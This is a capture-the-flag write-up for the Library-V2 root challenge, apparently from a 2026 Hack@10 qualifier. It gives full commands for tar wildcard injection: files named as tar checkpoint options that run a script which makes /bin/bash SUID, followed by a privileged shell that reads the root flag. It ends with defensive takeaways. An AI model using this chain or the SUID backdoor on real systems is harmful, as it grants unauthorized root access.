N
Back to writeup archive
Hack@10 International Capture The Flag Pre-Eliminary Round 2026

Library-V2 - root

Cron and tar wildcard privilege escalation for the Library-V2 root flag.

Boot2RootMarkdown + PDFRootsolved2 minreadยท490words
route
/TryN3rr0r/writeups/hack10-pre-eliminary-2026/library-v2-root
archive index
13 / 15
read mode
parsed markdown
Writeup loaded.

Library-V2 - root

challenge brief
target profile, scoring, and execution stack
verified solve
target
192.168.252.137
category
Boot2Root
points
493
difficulty
Medium
flag format
hack10{...}
tools used
sshpassbashtarbase64
final flag
hack10{cr0n_t4r_w1ldc4rd_1nj3ct10n_ftw}
reveal and copy from section 5

๐Ÿ† Challenge Objective

Following the initial user compromise of the machine 192.168.252.137 as the user librarian, the objective is to enumerate system configurations to find a privilege escalation vector, gain root access, and retrieve the final root flag.

<br>

๐Ÿ“ Methodology

#### 1. Challenge Overview

Having already acquired the credentials for the librarian user (Shhh!KeepQuiet), we return to the system to escalate privileges. This involves analyzing sudo privileges, SUID binaries, and automated cron jobs to find a vulnerable elevated process that can be exploited.

#### 2. Initial Reconnaissance

We started by authenticating via SSH as librarian and searching for low-hanging fruit such as sudo permissions and cron jobs. While sudo was not permitted, examining /etc/crontab revealed an interesting root cron job executing every minute.

bash15 lines
1$ cat << 'EOF' > enum2.sh2sshpass -p 'Shhh!KeepQuiet' ssh -o StrictHostKeyChecking=no librarian@192.168.252.137 "find / -perm -4000 -type f 2>/dev/null > /tmp/suids; cat /etc/crontab > /tmp/crons; cat /tmp/suids; echo '==='; cat /tmp/crons"3EOF4$ bash enum2.sh5/usr/lib/openssh/ssh-keysign6/usr/lib/dbus-1.0/dbus-daemon-launch-helper7/usr/bin/su8/usr/bin/chsh9/usr/bin/newgrp10/usr/bin/passwd11...12===13# /etc/crontab: system-wide crontab14...15* * * * * root /root/backup.sh
PDF evidence frame 01

#### 3. Analysis / Forensics Path

The cron job pointed to /root/backup.sh. Since we could not read the script directly due to permissions, we looked for recently modified backup files to infer its behavior. We discovered an updated books.tar inside /var/backups/.

bash3 lines
1$ sshpass -p 'Shhh!KeepQuiet' ssh librarian@192.168.252.137 "ls -la /var/backups/books.tar"23-rw-r--r-- 1 root root 10240 Mar 27 21:18 /var/backups/books.tar

The tar archive contains files from the /home/librarian/books directory, which is writable by our user.

Because the system runs a scheduled tar command on a directory we control, it strongly hints that the cron job executes something like cd /home/librarian/books \&\& tar cf /var/backups/books.tar *. This creates an opportunity for Tar Wildcard Injection, where creating files with specific flags (like --checkpoint=1) causes the tar command to interpret them as arguments instead of file names.

#### 4. Exploitation / Recovery

Using the tar wildcard injection vulnerability, we injected arbitrary command arguments that forced tar to execute a shell script as root. We created a script named root.sh that sets the SUID bit on the /bin/bash binary, and then passed it to tar via the --checkpoint-action=exec argument.

Solver Script Chain:

bash12 lines
1# Create the payload files inside the targeted backup directory2$ cat << 'EOF' > exploit.sh3sshpass -p 'Shhh!KeepQuiet' ssh -o StrictHostKeyChecking=no librarian@192.168.252.137 << 'SSH_EOF'4cd /home/librarian/books5echo "" > "--checkpoint=1"6echo "" > "--checkpoint-action=exec=sh root.sh"7echo '#!/bin/sh' > root.sh8echo 'chmod +s /bin/bash' >> root.sh9chmod +x root.sh10SSH_EOF11EOF12$ bash exploit.sh

After waiting a minute for the cron job to execute our injected arguments, we verified that /bin/bash was successfully set to SUID root (-rwsr-xr-x).

bash3 lines
1$ sshpass -p 'Shhh!KeepQuiet' ssh -o StrictHostKeyChecking=no librarian@192.168.252.137 "ls -la /bin/bash"23-rwsr-xr-x 1 root root 1396520 Mar 14  2024 /bin/bash

With a SUID bash binary available, we spawned a privileged shell with the -p parameter to retrieve the root flag:

bash4 lines
1$ sshpass -p 'Shhh!KeepQuiet' ssh -o StrictHostKeyChecking=no librarian@192.168.252.137 "/bin/bash -p -c 'cat /root/root.txt'"2aGFjazEwe2NyMG5fdDRyX3cxbGRjNHJkXzFuajNjdDEwbl9mdHd9Cg==3$ echo "aGFjazEwe2NyMG5fdDRyX3cxbGRjNHJkXzFuajNjdDEwbl9mdHd9Cg==" | base64 -d4hack10{cr0n_t4r_w1ldc4rd_1nj3ct10n_ftw}
PDF evidence frame 02

#### 5. Flag

captured flag
hack10{cr0n_t4r_w1ldc4rd_1nj3ct10n_ftw}

#### 6. Summary of Approach \& Key Takeaways

Methodology: We enumerated system cron jobs and discovered a restricted /root/backup.sh script that was archiving the /home/librarian/books folder using a wildcard (*). By creating maliciously named files (--checkpoint=1 and --checkpoint-action=exec=sh root.sh) inside that directory, we tricked the tar application into executing an arbitrary script as root. This script made /bin/bash an SUID binary, which gave us a persistent backdoor to retrieve the root flag.

Key Takeaways:

Using shell wildcards (like *) in bash scripts without strict path definitions (like ./*) is highly dangerous, particularly for commands like tar or chown that accept parameter flags directly.

Cron jobs running as root manipulating user-controlled directories are a very frequent vector for Local Privilege Escalation (LPE).

#

#

Web Exploitation Category

===

PDF evidence frame 03
PDF evidence frame 04